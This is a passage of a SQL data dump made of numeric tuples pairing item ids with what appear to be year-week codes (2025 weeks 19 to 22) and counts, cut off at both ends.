,(1594,1,'202519',6),(1608,1,'202519',6),(1610,1,'202519',6),(1614,1,'202519',6),(1695,1,'202519',6),(1718,1,'202519',6),(1732,1,'202519',6),(1741,1,'202519',6),(1772,1,'202519',6),(1776,1,'202519',6),(2165,1,'202519',6),(2293,1,'202519',6),(2297,1,'202519',6),(2609,1,'202519',6),(2617,1,'202519',6),(2748,1,'202519',6),(2751,1,'202519',6),(2813,1,'202519',6),(3004,1,'202519',6),(3006,1,'202519',6),(3066,1,'202519',6),(3072,1,'202519',6),(3087,1,'202519',6),(3097,1,'202519',6),(3109,1,'202519',6),(3243,1,'202519',6),(3275,1,'202519',6),(3287,1,'202519',6),(3316,1,'202519',6),(3479,1,'202519',6),(3721,1,'202519',6),(3735,1,'202519',6),(3738,1,'202519',6),(3746,1,'202519',6),(3771,1,'202519',6),(4238,1,'202519',6),(4275,1,'202519',6),(4326,1,'202519',6),(4329,1,'202519',6),(4357,1,'202519',6),(4373,1,'202519',6),(4387,1,'202519',6),(4416,1,'202519',6),(4424,1,'202519',6),(4454,1,'202519',6),(4457,1,'202519',6),(4524,1,'202519',6),(4529,1,'202519',6),(4542,1,'202519',6),(4608,1,'202519',6),(4654,1,'202519',6),(4681,1,'202519',6),(4691,1,'202519',6),(4703,1,'202519',6),(4709,1,'202519',6),(4722,1,'202519',6),(4741,1,'202519',6),(4750,1,'202519',6),(4756,1,'202519',6),(4768,1,'202519',6),(4866,1,'202519',6),(4878,1,'202519',6),(4893,1,'202519',6),(4897,1,'202519',6),(4976,1,'202519',6),(4983,1,'202519',6),(4996,1,'202519',6),(5046,1,'202519',6),(5067,1,'202519',6),(5080,1,'202519',6),(5122,1,'202519',6),(5146,1,'202519',6),(5248,1,'202519',6),(5253,1,'202519',6),(5271,1,'202519',6),(5298,1,'202519',6),(5330,1,'202519',6),(5363,1,'202519',6),(467,1,'202519',7),(476,1,'202519',7),(477,1,'202519',7),(478,1,'202519',7),(479,1,'202519',7),(483,1,'202519',7),(488,1,'202519',7),(570,1,'202519',7),(1586,1,'202519',7),(1590,1,'202519',7),(1596,1,'202519',7),(1724,1,'202519',7),(1730,1,'202519',7),(1734,1,'202519',7),(1778,1,'202519',7),(2296,1,'202519',7),(2457,1,'202519',7),(2658,1,'202519',7),(2704,1,'202519',7),(2801,1,'202519',7),(2956,1,'202519',7),(2964,1,'202519',7),(3034,1,'202519',7),(3038,1,'202519',7),(3063,1,'202519',7),(3069,1,'202519',7),(3090,1,'202519',7),(3096,1,'202519',7),(3229,1,'202519',7),(3247,1,'202519',7),(3249,1,'202519',7),(3251,1,'202519',7),(3269,1,'202519',7),(3273,1,'202519',7),(3278,1,'202519',7),(3280,1,'202519',7),(3290,1,'202519',7),(3430,1,'202519',7),(3541,1,'202519',7),(3724,1,'202519',7),(3727,1,'202519',7),(3731,1,'202519',7),(3752,1,'202519',7),(3774,1,'202519',7),(3777,1,'202519',7),(4323,1,'202519',7),(4335,1,'202519',7),(4341,1,'202519',7),(4391,1,'202519',7),(4412,1,'202519',7),(4420,1,'202519',7),(4436,1,'202519',7),(4448,1,'202519',7),(4514,1,'202519',7),(4551,1,'202519',7),(4566,1,'202519',7),(4651,1,'202519',7),(4657,1,'202519',7),(4685,1,'202519',7),(4688,1,'202519',7),(4697,1,'202519',7),(4712,1,'202519',7),(4747,1,'202519',7),(4759,1,'202519',7),(4762,1,'202519',7),(4765,1,'202519',7),(4771,1,'202519',7),(4870,1,'202519',7),(5033,1,'202519',7),(5054,1,'202519',7),(5062,1,'202519',7),(5071,1,'202519',7),(5101,1,'202519',7),(5128,1,'202519',7),(5137,1,'202519',7),(5259,1,'202519',7),(5264,1,'202519',7),(5276,1,'202519',7),(5280,1,'202519',7),(5295,1,'202519',7),(5310,1,'202519',7),(5323,1,'202519',7),(5326,1,'202519',7),(5378,1,'202519',7),(472,1,'202519',8),(480,1,'202519',8),(481,1,'202519',8),(1612,1,'202519',8),(1699,1,'202519',8),(1703,1,'202519',8),(1726,1,'202519',8),(1745,1,'202519',8),(1768,1,'202519',8),(1770,1,'202519',8),(2156,1,'202519',8),(2178,1,'202519',8),(2309,1,'202519',8),(2558,1,'202519',8),(2769,1,'202519',8),(2775,1,'202519',8),(2804,1,'202519',8),(2809,1,'202519',8),(3117,1,'202519',8),(3253,1,'202519',8),(3297,1,'202519',8),(3482,1,'202519',8),(3489,1,'202519',8),(3531,1,'202519',8),(3710,1,'202519',8),(3714,1,'202519',8),(4332,1,'202519',8),(4400,1,'202519',8),(4440,1,'202519',8),(4517,1,'202519',8),(4520,1,'202519',8),(4556,1,'202519',8),(4582,1,'202519',8),(4591,1,'202519',8),(4645,1,'202519',8),(4668,1,'202519',8),(4674,1,'202519',8),(4694,1,'202519',8),(4753,1,'202519',8),(4797,1,'202519',8),(4874,1,'202519',8),(4888,1,'202519',8),(4977,1,'202519',8),(4988,1,'202519',8),(5058,1,'202519',8),(5125,1,'202519',8),(5131,1,'202519',8),(5134,1,'202519',8),(5256,1,'202519',8),(5289,1,'202519',8),(5292,1,'202519',8),(5301,1,'202519',8),(5304,1,'202519',8),(5307,1,'202519',8),(5314,1,'202519',8),(5317,1,'202519',8),(5320,1,'202519',8),(5374,1,'202519',8),(5383,1,'202519',8),(469,1,'202519',9),(471,1,'202519',9),(485,1,'202519',9),(1598,1,'202519',9),(1600,1,'202519',9),(1604,1,'202519',9),(1606,1,'202519',9),(2159,1,'202519',9),(2911,1,'202519',9),(2989,1,'202519',9),(2991,1,'202519',9),(3023,1,'202519',9),(3027,1,'202519',9),(3030,1,'202519',9),(3124,1,'202519',9),(3226,1,'202519',9),(3267,1,'202519',9),(3438,1,'202519',9),(3486,1,'202519',9),(3742,1,'202519',9),(4301,1,'202519',9),(4338,1,'202519',9),(4663,1,'202519',9),(4677,1,'202519',9),(4980,1,'202519',9),(5140,1,'202519',9),(5153,1,'202519',9),(5268,1,'202519',9),(486,1,'202519',10),(1709,1,'202519',10),(3127,1,'202519',10),(3534,1,'202519',10),(4612,1,'202519',10),(4660,1,'202519',10),(5076,1,'202519',10),(1582,1,'202519',11),(1592,1,'202519',11),(3083,1,'202519',11),(4648,1,'202519',11),(5353,1,'202519',11),(473,1,'202519',12),(4744,1,'202519',12),(468,1,'202519',13),(474,1,'202519',13),(487,1,'202519',13),(4776,1,'202519',13),(5157,1,'202519',13),(5359,1,'202519',13),(87,1,'202519',15),(470,1,'202519',15),(3498,1,'202519',15),(5356,1,'202519',15),(4930,1,'202519',17),(5334,1,'202519',17),(74,1,'202519',18),(84,1,'202519',18),(91,1,'202519',18),(3060,1,'202519',19),(108,1,'202519',21),(5397,1,'202519',21),(5400,1,'202519',22),(335,1,'202519',25),(2503,1,'202519',26),(76,1,'202519',29),(2904,1,'202519',30),(3781,1,'202519',30),(72,1,'202519',31),(89,1,'202519',31),(68,1,'202519',66),(80,1,'202519',71),(9,1,'202519',6276),(102,1,'202520',2),(110,1,'202520',2),(1610,1,'202520',2),(2964,1,'202520',2),(3083,1,'202520',2),(4759,1,'202520',2),(5033,1,'202520',2),(5146,1,'202520',2),(5248,1,'202520',2),(5264,1,'202520',2),(1584,1,'202520',3),(1590,1,'202520',3),(1604,1,'202520',3),(3297,1,'202520',3),(4416,1,'202520',3),(4744,1,'202520',3),(5042,1,'202520',3),(5050,1,'202520',3),(5062,1,'202520',3),(5067,1,'202520',3),(5080,1,'202520',3),(5153,1,'202520',3),(5259,1,'202520',3),(5326,1,'202520',3),(476,1,'202520',4),(479,1,'202520',4),(1596,1,'202520',4),(1600,1,'202520',4),(1705,1,'202520',4),(1747,1,'202520',4),(2704,1,'202520',4),(2748,1,'202520',4),(2989,1,'202520',4),(3226,1,'202520',4),(3229,1,'202520',4),(3267,1,'202520',4),(3486,1,'202520',4),(3746,1,'202520',4),(3752,1,'202520',4),(3771,1,'202520',4),(4338,1,'202520',4),(4363,1,'202520',4),(4373,1,'202520',4),(4387,1,'202520',4),(4436,1,'202520',4),(4457,1,'202520',4),(4612,1,'202520',4),(4685,1,'202520',4),(4703,1,'202520',4),(4741,1,'202520',4),(4874,1,'202520',4),(5046,1,'202520',4),(5054,1,'202520',4),(5058,1,'202520',4),(5071,1,'202520',4),(5140,1,'202520',4),(5157,1,'202520',4),(5163,1,'202520',4),(5378,1,'202520',4),(106,1,'202520',5),(478,1,'202520',5),(483,1,'202520',5),(488,1,'202520',5),(1544,1,'202520',5),(1588,1,'202520',5),(1592,1,'202520',5),(1594,1,'202520',5),(1606,1,'202520',5),(1608,1,'202520',5),(1718,1,'202520',5),(1766,1,'202520',5),(1776,1,'202520',5),(1778,1,'202520',5),(2150,1,'202520',5),(2154,1,'202520',5),(2161,1,'202520',5),(2293,1,'202520',5),(2617,1,'202520',5),(2965,1,'202520',5),(2991,1,'202520',5),(3004,1,'202520',5),(3005,1,'202520',5),(3006,1,'202520',5),(3096,1,'202520',5),(3240,1,'202520',5),(3249,1,'202520',5),(3251,1,'202520',5),(3253,1,'202520',5),(3271,1,'202520',5),(3275,1,'202520',5),(3278,1,'202520',5),(3287,1,'202520',5),(3430,1,'202520',5),(3742,1,'202520',5),(4368,1,'202520',5),(4391,1,'202520',5),(4408,1,'202520',5),(4412,1,'202520',5),(4428,1,'202520',5),(4432,1,'202520',5),(4514,1,'202520',5),(4582,1,'202520',5),(4591,1,'202520',5),(4660,1,'202520',5),(4668,1,'202520',5),(4674,1,'202520',5),(4681,1,'202520',5),(4694,1,'202520',5),(4706,1,'202520',5),(4709,1,'202520',5),(4756,1,'202520',5),(4792,1,'202520',5),(4802,1,'202520',5),(4858,1,'202520',5),(4888,1,'202520',5),(4977,1,'202520',5),(4983,1,'202520',5),(5295,1,'202520',5),(5314,1,'202520',5),(5317,1,'202520',5),(5320,1,'202520',5),(5323,1,'202520',5),(5330,1,'202520',5),(5383,1,'202520',5),(480,1,'202520',6),(482,1,'202520',6),(485,1,'202520',6),(1586,1,'202520',6),(1598,1,'202520',6),(1614,1,'202520',6),(1703,1,'202520',6),(1711,1,'202520',6),(1732,1,'202520',6),(1734,1,'202520',6),(1737,1,'202520',6),(1739,1,'202520',6),(1745,1,'202520',6),(1772,1,'202520',6),(1774,1,'202520',6),(2063,1,'202520',6),(2148,1,'202520',6),(2152,1,'202520',6),(2159,1,'202520',6),(2165,1,'202520',6),(2248,1,'202520',6),(2751,1,'202520',6),(2769,1,'202520',6),(2775,1,'202520',6),(2801,1,'202520',6),(2804,1,'202520',6),(3034,1,'202520',6),(3041,1,'202520',6),(3092,1,'202520',6),(3109,1,'202520',6),(3124,1,'202520',6),(3245,1,'202520',6),(3269,1,'202520',6),(3273,1,'202520',6),(3285,1,'202520',6),(3479,1,'202520',6),(3531,1,'202520',6),(3738,1,'202520',6),(3749,1,'202520',6),(3774,1,'202520',6),(4238,1,'202520',6),(4275,1,'202520',6),(4335,1,'202520',6),(4357,1,'202520',6),(4382,1,'202520',6),(4396,1,'202520',6),(4404,1,'202520',6),(4440,1,'202520',6),(4517,1,'202520',6),(4520,1,'202520',6),(4587,1,'202520',6),(4657,1,'202520',6),(4663,1,'202520',6),(4677,1,'202520',6),(4691,1,'202520',6),(4700,1,'202520',6),(4747,1,'202520',6),(4762,1,'202520',6),(4797,1,'202520',6),(4862,1,'202520',6),(4866,1,'202520',6),(4883,1,'202520',6),(4897,1,'202520',6),(4988,1,'202520',6),(5020,1,'202520',6),(5028,1,'202520',6),(5037,1,'202520',6),(5125,1,'202520',6),(5256,1,'202520',6),(5271,1,'202520',6),(5307,1,'202520',6),(5310,1,'202520',6),(5363,1,'202520',6),(5374,1,'202520',6),(477,1,'202520',7),(481,1,'202520',7),(484,1,'202520',7),(486,1,'202520',7),(1602,1,'202520',7),(1695,1,'202520',7),(1697,1,'202520',7),(1701,1,'202520',7),(1709,1,'202520',7),(1713,1,'202520',7),(1720,1,'202520',7),(1724,1,'202520',7),(1728,1,'202520',7),(1730,1,'202520',7),(1751,1,'202520',7),(1770,1,'202520',7),(1780,1,'202520',7),(1782,1,'202520',7),(2156,1,'202520',7),(2252,1,'202520',7),(2296,1,'202520',7),(2609,1,'202520',7),(2658,1,'202520',7),(2911,1,'202520',7),(2993,1,'202520',7),(3027,1,'202520',7),(3063,1,'202520',7),(3069,1,'202520',7),(3097,1,'202520',7),(3243,1,'202520',7),(3261,1,'202520',7),(3280,1,'202520',7),(3282,1,'202520',7),(3307,1,'202520',7),(3316,1,'202520',7),(3482,1,'202520',7),(3534,1,'202520',7),(3721,1,'202520',7),(3727,1,'202520',7),(3777,1,'202520',7),(4301,1,'202520',7),(4323,1,'202520',7),(4326,1,'202520',7),(4341,1,'202520',7),(4400,1,'202520',7),(4420,1,'202520',7),(4444,1,'202520',7),(4454,1,'202520',7),(4546,1,'202520',7),(4551,1,'202520',7),(4645,1,'202520',7),(4688,1,'202520',7),(4697,1,'202520',7),(4712,1,'202520',7),(4722,1,'202520',7),(4750,1,'202520',7),(4753,1,'202520',7),(4765,1,'202520',7),(4870,1,'202520',7),(4893,1,'202520',7),(4976,1,'202520',7),(4980,1,'202520',7),(4996,1,'202520',7),(5024,1,'202520',7),(5076,1,'202520',7),(5134,1,'202520',7),(5253,1,'202520',7),(5268,1,'202520',7),(5280,1,'202520',7),(5289,1,'202520',7),(5298,1,'202520',7),(471,1,'202520',8),(472,1,'202520',8),(570,1,'202520',8),(1707,1,'202520',8),(1722,1,'202520',8),(1741,1,'202520',8),(1749,1,'202520',8),(1768,1,'202520',8),(2178,1,'202520',8),(3045,1,'202520',8),(3072,1,'202520',8),(3117,1,'202520',8),(3127,1,'202520',8),(3247,1,'202520',8),(3257,1,'202520',8),(3259,1,'202520',8),(3265,1,'202520',8),(3313,1,'202520',8),(3541,1,'202520',8),(3714,1,'202520',8),(3731,1,'202520',8),(3735,1,'202520',8),(4329,1,'202520',8),(4332,1,'202520',8),(4377,1,'202520',8),(4424,1,'202520',8),(4529,1,'202520',8),(4608,1,'202520',8),(4651,1,'202520',8),(4654,1,'202520',8),(4878,1,'202520',8),(5101,1,'202520',8),(5137,1,'202520',8),(5276,1,'202520',8),(5292,1,'202520',8),(5301,1,'202520',8),(5304,1,'202520',8),(5356,1,'202520',8),(1612,1,'202520',9),(1699,1,'202520',9),(1726,1,'202520',9),(2297,1,'202520',9),(2457,1,'202520',9),(2558,1,'202520',9),(2809,1,'202520',9),(2813,1,'202520',9),(2956,1,'202520',9),(3023,1,'202520',9),(3066,1,'202520',9),(3087,1,'202520',9),(3102,1,'202520',9),(3104,1,'202520',9),(3263,1,'202520',9),(3438,1,'202520',9),(4524,1,'202520',9),(4542,1,'202520',9),(4648,1,'202520',9),(4771,1,'202520',9),(5122,1,'202520',9),(5128,1,'202520',9),(5131,1,'202520',9),(469,1,'202520',10),(1743,1,'202520',10),(2309,1,'202520',10),(3030,1,'202520',10),(3038,1,'202520',10),(3079,1,'202520',10),(3090,1,'202520',10),(3107,1,'202520',10),(3710,1,'202520',10),(3724,1,'202520',10),(4566,1,'202520',10),(74,1,'202520',11),(1715,1,'202520',11),(3290,1,'202520',11),(3764,1,'202520',11),(4556,1,'202520',11),(4768,1,'202520',11),(5353,1,'202520',11),(467,1,'202520',12),(1582,1,'202520',12),(4448,1,'202520',12),(4930,1,'202520',12),(5359,1,'202520',12),(108,1,'202520',13),(3489,1,'202520',13),(84,1,'202520',14),(3060,1,'202520',15),(473,1,'202520',16),(3781,1,'202520',16),(91,1,'202520',17),(470,1,'202520',17),(487,1,'202520',17),(87,1,'202520',18),(468,1,'202520',18),(5400,1,'202520',19),(5334,1,'202520',23),(3498,1,'202520',24),(4776,1,'202520',24),(89,1,'202520',25),(5412,1,'202520',29),(5397,1,'202520',30),(72,1,'202520',31),(2904,1,'202520',33),(335,1,'202520',35),(2503,1,'202520',38),(76,1,'202520',41),(5409,1,'202520',46),(68,1,'202520',62),(474,1,'202520',90),(80,1,'202520',96),(5415,1,'202520',112),(5406,1,'202520',208),(9,1,'202520',1914),(3280,1,'202521',1),(106,1,'202521',2),(570,1,'202521',2),(2296,1,'202521',2),(2617,1,'202521',2),(2809,1,'202521',2),(3269,1,'202521',2),(3307,1,'202521',2),(3489,1,'202521',2),(3714,1,'202521',2),(4382,1,'202521',2),(4396,1,'202521',2),(4792,1,'202521',2),(4888,1,'202521',2),(4977,1,'202521',2),(5020,1,'202521',2),(5033,1,'202521',2),(5042,1,'202521',2),(5101,1,'202521',2),(5122,1,'202521',2),(5163,1,'202521',2),(110,1,'202521',3),(1703,1,'202521',3),(1705,1,'202521',3),(1732,1,'202521',3),(1734,1,'202521',3),(1751,1,'202521',3),(1768,1,'202521',3),(2156,1,'202521',3),(2751,1,'202521',3),(2804,1,'202521',3),(3034,1,'202521',3),(3072,1,'202521',3),(3090,1,'202521',3),(3092,1,'202521',3),(3096,1,'202521',3),(3104,1,'202521',3),(3226,1,'202521',3),(3240,1,'202521',3),(3243,1,'202521',3),(3245,1,'202521',3),(3251,1,'202521',3),(3259,1,'202521',3),(3263,1,'202521',3),(3267,1,'202521',3),(4238,1,'202521',3),(4301,1,'202521',3),(4335,1,'202521',3),(4357,1,'202521',3),(4368,1,'202521',3),(4373,1,'202521',3),(4391,1,'202521',3),(4412,1,'202521',3),(4428,1,'202521',3),(4432,1,'202521',3),(4440,1,'202521',3),(4566,1,'202521',3),(4587,1,'202521',3),(4691,1,'202521',3),(4741,1,'202521',3),(4797,1,'202521',3),(4802,1,'202521',3),(4858,1,'202521',3),(4866,1,'202521',3),(4874,1,'202521',3),(4883,1,'202521',3),(5024,1,'202521',3),(5028,1,'202521',3),(5050,1,'202521',3),(5080,1,'202521',3),(5146,1,'202521',3),(5153,1,'202521',3),(5289,1,'202521',3),(102,1,'202521',4),(469,1,'202521',4),(486,1,'202521',4),(1709,1,'202521',4),(1718,1,'202521',4),(1774,1,'202521',4),(2148,1,'202521',4),(2152,1,'202521',4),(2297,1,'202521',4),(2658,1,'202521',4),(2956,1,'202521',4),(3027,1,'202521',4),(3038,1,'202521',4),(3087,1,'202521',4),(3229,1,'202521',4),(3257,1,'202521',4),(3273,1,'202521',4),(3275,1,'202521',4),(3278,1,'202521',4),(3541,1,'202521',4),(3710,1,'202521',4),(3721,1,'202521',4),(3727,1,'202521',4),(3731,1,'202521',4),(3735,1,'202521',4),(3764,1,'202521',4),(4363,1,'202521',4),(4377,1,'202521',4),(4404,1,'202521',4),(4408,1,'202521',4),(4416,1,'202521',4),(4444,1,'202521',4),(4514,1,'202521',4),(4529,1,'202521',4),(4551,1,'202521',4),(4608,1,'202521',4),(4612,1,'202521',4),(4648,1,'202521',4),(4663,1,'202521',4),(4674,1,'202521',4),(4677,1,'202521',4),(4688,1,'202521',4),(4694,1,'202521',4),(4700,1,'202521',4),(4706,1,'202521',4),(4709,1,'202521',4),(4712,1,'202521',4),(4722,1,'202521',4),(4759,1,'202521',4),(4768,1,'202521',4),(4771,1,'202521',4),(4862,1,'202521',4),(4870,1,'202521',4),(4897,1,'202521',4),(4980,1,'202521',4),(4983,1,'202521',4),(4996,1,'202521',4),(5037,1,'202521',4),(5046,1,'202521',4),(5071,1,'202521',4),(5125,1,'202521',4),(5134,1,'202521',4),(5137,1,'202521',4),(5248,1,'202521',4),(5253,1,'202521',4),(5271,1,'202521',4),(5276,1,'202521',4),(5295,1,'202521',4),(5298,1,'202521',4),(5301,1,'202521',4),(5310,1,'202521',4),(5317,1,'202521',4),(5330,1,'202521',4),(5356,1,'202521',4),(5359,1,'202521',4),(5363,1,'202521',4),(5374,1,'202521',4),(5378,1,'202521',4),(1590,1,'202521',5),(1610,1,'202521',5),(1695,1,'202521',5),(1701,1,'202521',5),(1711,1,'202521',5),(1713,1,'202521',5),(1720,1,'202521',5),(1722,1,'202521',5),(1730,1,'202521',5),(1737,1,'202521',5),(1739,1,'202521',5),(1747,1,'202521',5),(1766,1,'202521',5),(1770,1,'202521',5),(1772,1,'202521',5),(2063,1,'202521',5),(2178,1,'202521',5),(2248,1,'202521',5),(2293,1,'202521',5),(2309,1,'202521',5),(2748,1,'202521',5),(2775,1,'202521',5),(2964,1,'202521',5),(2989,1,'202521',5),(2991,1,'202521',5),(2993,1,'202521',5),(3041,1,'202521',5),(3045,1,'202521',5),(3063,1,'202521',5),(3079,1,'202521',5),(3083,1,'202521',5),(3102,1,'202521',5),(3107,1,'202521',5),(3124,1,'202521',5),(3249,1,'202521',5),(3261,1,'202521',5),(3271,1,'202521',5),(3282,1,'202521',5),(3313,1,'202521',5),(3316,1,'202521',5),(3482,1,'202521',5),(3724,1,'202521',5),(3742,1,'202521',5),(3749,1,'202521',5),(3752,1,'202521',5),(3771,1,'202521',5),(4323,1,'202521',5),(4329,1,'202521',5),(4338,1,'202521',5),(4341,1,'202521',5),(4387,1,'202521',5),(4448,1,'202521',5),(4517,1,'202521',5),(4542,1,'202521',5),(4546,1,'202521',5),(4556,1,'202521',5),(4645,1,'202521',5),(4660,1,'202521',5),(4668,1,'202521',5),(4744,1,'202521',5),(4747,1,'202521',5),(4753,1,'202521',5),(4762,1,'202521',5),(4765,1,'202521',5),(4878,1,'202521',5),(4893,1,'202521',5),(4976,1,'202521',5),(5054,1,'202521',5),(5058,1,'202521',5),(5067,1,'202521',5),(5128,1,'202521',5),(5157,1,'202521',5),(5259,1,'202521',5),(5268,1,'202521',5),(5280,1,'202521',5),(5292,1,'202521',5),(5307,1,'202521',5),(5320,1,'202521',5),(5383,1,'202521',5),(471,1,'202521',6),(472,1,'202521',6),(479,1,'202521',6),(482,1,'202521',6),(485,1,'202521',6),(1598,1,'202521',6),(1697,1,'202521',6),(1726,1,'202521',6),(1728,1,'202521',6),(1741,1,'202521',6),(1743,1,'202521',6),(1749,1,'202521',6),(1778,1,'202521',6),(1782,1,'202521',6),(2159,1,'202521',6),(2252,1,'202521',6),(2457,1,'202521',6),(2558,1,'202521',6),(2704,1,'202521',6),(2801,1,'202521',6),(2911,1,'202521',6),(3004,1,'202521',6),(3030,1,'202521',6),(3069,1,'202521',6),(3109,1,'202521',6),(3265,1,'202521',6),(3285,1,'202521',6),(3287,1,'202521',6),(3290,1,'202521',6),(3297,1,'202521',6),(3479,1,'202521',6),(3531,1,'202521',6),(3534,1,'202521',6),(3738,1,'202521',6),(3746,1,'202521',6),(4275,1,'202521',6),(4326,1,'202521',6),(4332,1,'202521',6),(4400,1,'202521',6),(4420,1,'202521',6),(4424,1,'202521',6),(4436,1,'202521',6),(4454,1,'202521',6),(4457,1,'202521',6),(4524,1,'202521',6),(4582,1,'202521',6),(4591,1,'202521',6),(4651,1,'202521',6),(4654,1,'202521',6),(4657,1,'202521',6),(4681,1,'202521',6),(4685,1,'202521',6),(4756,1,'202521',6),(5062,1,'202521',6),(5131,1,'202521',6),(5140,1,'202521',6),(5264,1,'202521',6),(5314,1,'202521',6),(5323,1,'202521',6),(5353,1,'202521',6),(476,1,'202521',7),(478,1,'202521',7),(481,1,'202521',7),(483,1,'202521',7),(1544,1,'202521',7),(1584,1,'202521',7),(1600,1,'202521',7),(1612,1,'202521',7),(1699,1,'202521',7),(1707,1,'202521',7),(1715,1,'202521',7),(1776,1,'202521',7),(2150,1,'202521',7),(2161,1,'202521',7),(2609,1,'202521',7),(2769,1,'202521',7),(2813,1,'202521',7),(3005,1,'202521',7),(3006,1,'202521',7),(3066,1,'202521',7),(3117,1,'202521',7),(3253,1,'202521',7),(3774,1,'202521',7),(3777,1,'202521',7),(4697,1,'202521',7),(4703,1,'202521',7),(4750,1,'202521',7),(4988,1,'202521',7),(5304,1,'202521',7),(5326,1,'202521',7),(467,1,'202521',8),(1588,1,'202521',8),(1594,1,'202521',8),(1602,1,'202521',8),(1604,1,'202521',8),(1606,1,'202521',8),(1608,1,'202521',8),(1724,1,'202521',8),(1780,1,'202521',8),(2154,1,'202521',8),(2965,1,'202521',8),(3097,1,'202521',8),(3127,1,'202521',8),(3247,1,'202521',8),(3430,1,'202521',8),(3486,1,'202521',8),(4520,1,'202521',8),(5076,1,'202521',8),(5409,1,'202521',8),(477,1,'202521',9),(480,1,'202521',9),(484,1,'202521',9),(1592,1,'202521',9),(1614,1,'202521',9),(1745,1,'202521',9),(2165,1,'202521',9),(3438,1,'202521',9),(3498,1,'202521',9),(1596,1,'202521',10),(3023,1,'202521',10),(5256,1,'202521',10),(5334,1,'202521',10),(1586,1,'202521',11),(470,1,'202521',12),(473,1,'202521',12),(488,1,'202521',12),(5400,1,'202521',12),(487,1,'202521',13),(1582,1,'202521',13),(468,1,'202521',14),(5412,1,'202521',14),(74,1,'202521',16),(474,1,'202521',16),(4776,1,'202521',16),(108,1,'202521',17),(72,1,'202521',18),(84,1,'202521',18),(87,1,'202521',18),(4930,1,'202521',18),(5397,1,'202521',19),(3781,1,'202521',22),(5433,1,'202521',24),(91,1,'202521',26),(5406,1,'202521',26),(89,1,'202521',29),(2904,1,'202521',29),(5420,1,'202521',30),(335,1,'202521',31),(2503,1,'202521',34),(5415,1,'202521',39),(76,1,'202521',47),(5425,1,'202521',60),(3060,1,'202521',67),(68,1,'202521',70),(80,1,'202521',100),(5428,1,'202521',182),(9,1,'202521',2145),(1695,1,'202522',1),(1718,1,'202522',1),(1745,1,'202522',1),(1770,1,'202522',1),(2154,1,'202522',1),(2161,1,'202522',1),(3069,1,'202522',1),(3096,1,'202522',1),(3247,1,'202522',1),(3482,1,'202522',1),(3724,1,'202522',1),(3738,1,'202522',1),(3746,1,'202522',1),(4323,1,'202522',1),(4326,1,'202522',1),(4357,1,'202522',1),(4363,1,'202522',1),(4382,1,'202522',1),(4387,1,'202522',1),(4404,1,'202522',1),(4436,1,'202522',1),(4517,1,'202522',1),(4546,1,'202522',1),(4551,1,'202522',1),(4608,1,'202522',1),(4654,1,'202522',1),(4674,1,'202522',1),(4677,1,'202522',1),(4688,1,'202522',1),(4722,1,'202522',1),(4747,1,'202522',1),(4802,1,'202522',1),(4874,1,'202522',1),(4878,1,'202522',1),(5037,1,'202522',1),(5128,1,'202522',1),(5363,1,'202522',1),(5378,1,'202522',1),(106,1,'202522',2),(110,1,'202522',2),(482,1,'202522',2),(1600,1,'202522',2),(1604,1,'202522',2),(1610,1,'202522',2),(1699,1,'202522',2),(1713,1,'202522',2),(1720,1,'202522',2),(1743,1,'202522',2),(1749,1,'202522',2),(2156,1,'202522',2),(2165,1,'202522',2),(2252,1,'202522',2),(2309,1,'202522',2),(2751,1,'202522',2),(2965,1,'202522',2),(3027,1,'202522',2),(3249,1,'202522',2),(3253,1,'202522',2),(3261,1,'202522',2),(3269,1,'202522',2),(3313,1,'202522',2),(3731,1,'202522',2),(3749,1,'202522',2),(3752,1,'202522',2),(4275,1,'202522',2),(4341,1,'202522',2),(4373,1,'202522',2),(4412,1,'202522',2),(4440,1,'202522',2),(4454,1,'202522',2),(4457,1,'202522',2),(4520,1,'202522',2),(4529,1,'202522',2),(4566,1,'202522',2),(4587,1,'202522',2),(4591,1,'202522',2),(4612,1,'202522',2),(4657,1,'202522',2),(4660,1,'202522',2),(4663,1,'202522',2),(4700,1,'202522',2),(4703,1,'202522',2),(4706,1,'202522',2),(4712,1,'202522',2),(4744,1,'202522',2),(4756,1,'202522',2),(4765,1,'202522',2),(4771,1,'202522',2),(4792,1,'202522',2),(4858,1,'202522',2),(4866,1,'202522',2),(4870,1,'202522',2),(4983,1,'202522',2),(5020,1,'202522',2),(5122,1,'202522',2),(5125,1,'202522',2),(5271,1,'202522',2),(5276,1,'202522',2),(5289,1,'202522',2),(5310,1,'202522',2),(5317,1,'202522',2),(467,1,'202522',3),(471,1,'202522',3),(477,1,'202522',3),(480,1,'202522',3),(484,1,'202522',3),(1598,1,'202522',3),(1602,1,'202522',3),(1606,1,'202522',3),(1697,1,'202522',3),(1711,1,'202522',3),(1724,1,'202522',3),(1737,1,'202522',3),(1739,1,'202522',3),(1747,1,'202522',3),(1780,1,'202522',3),(2063,1,'202522',3),(2148,1,'202522',3),(2248,1,'202522',3),(2617,1,'202522',3),(2748,1,'202522',3),(2804,1,'202522',3),(3030,1,'202522',3),(3034,1,'202522',3),(3038,1,'202522',3),(3045,1,'202522',3),(3072,1,'202522',3),(3079,1,'202522',3),(3083,1,'202522',3),(3092,1,'202522',3),(3097,1,'202522',3),(3117,1,'202522',3),(3240,1,'202522',3),(3259,1,'202522',3),(3263,1,'202522',3),(3278,1,'202522',3),(3297,1,'202522',3),(3316,1,'202522',3),(3430,1,'202522',3),(3486,1,'202522',3),(3498,1,'202522',3),(3541,1,'202522',3),(3710,1,'202522',3),(3714,1,'202522',3),(3721,1,'202522',3),(3727,1,'202522',3),(3774,1,'202522',3),(4338,1,'202522',3),(4377,1,'202522',3),(4391,1,'202522',3),(4408,1,'202522',3),(4428,1,'202522',3),(4556,1,'202522',3),(4582,1,'202522',3),(4741,1,'202522',3),(4753,1,'202522',3),(4768,1,'202522',3),(4862,1,'202522',3),(4976,1,'202522',3),(4977,1,'202522',3),(4988,1,'202522',3),(5046,1,'202522',3),(5054,1,'202522',3),(5058,1,'202522',3),(5062,1,'202522',3),(5067,1,'202522',3),(5248,1,'202522',3),(5256,1,'202522',3),(5264,1,'202522',3),(5298,1,'202522',3),(5304,1,'202522',3),(5307,1,'202522',3),(5326,1,'202522',3),(5330,1,'202522',3),(5334,1,'202522',3),(5353,1,'202522',3),(5383,1,'202522',3),(102,1,'202522',4),(472,1,'202522',4),(478,1,'202522',4),(479,1,'202522',4),(481,1,'202522',4),(483,1,'202522',4),(485,1,'202522',4),(1544,1,'202522',4),(1590,1,'202522',4),(1596,1,'202522',4),(1612,1,'202522',4),(1701,1,'202522',4),(1703,1,'202522',4),(1709,1,'202522',4),(1722,1,'202522',4),(1728,1,'202522',4),(1734,1,'202522',4),(1772,1,'202522',4),(1774,1,'202522',4),(1776,1,'202522',4),(2150,1,'2025